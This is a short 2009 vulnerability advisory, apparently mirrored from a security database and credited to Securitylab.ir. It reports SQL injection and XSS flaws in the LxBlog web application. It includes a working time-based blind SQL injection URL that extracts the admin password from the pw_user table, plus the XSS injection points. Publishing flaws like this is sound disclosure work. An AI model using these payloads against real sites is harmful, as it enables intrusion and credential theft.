Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:21873
HistoryMay 25, 2009 - 12:00 a.m.

LxBlog

2009-05-2500:00:00
vulners.com
83

######################### Securitylab.ir ########################

Application Info:

Name: LxBlog

Website: http://www.lxblog.net

#################################################################

Discoverd By: Securitylab.ir

Website: http://securitylab.ir

Contacts: admin[at]securitylab.ir & info@securitylab[dot]ir

#################################################################

Vulnerability Info:

Type: Sql/Xss

Risk: Medium

#===========================================================

Sql Injection:

http://site.com/user_index.php?action=tag&job=modify&type=blog k LEFT JOIN pw_user i ON 1=1

WHERE i.uid =1 AND if((ASCII(SUBSTRING(password,1,1))>0),sleep(10),1)/&item_type[]=blog k LEFT
JOIN pw_user i ON 1=1 WHERE i.uid =1 AND if((ASCII(SUBSTRING(password,1,1))>0),sleep(10),1)/

Xss:

http://site.com/user_index.php?action=tag&job=modify&type=[XSS]&item_type[]=[XSS]

#===========================================================
#################################################################

Securitylab Security Research Team

###################################################################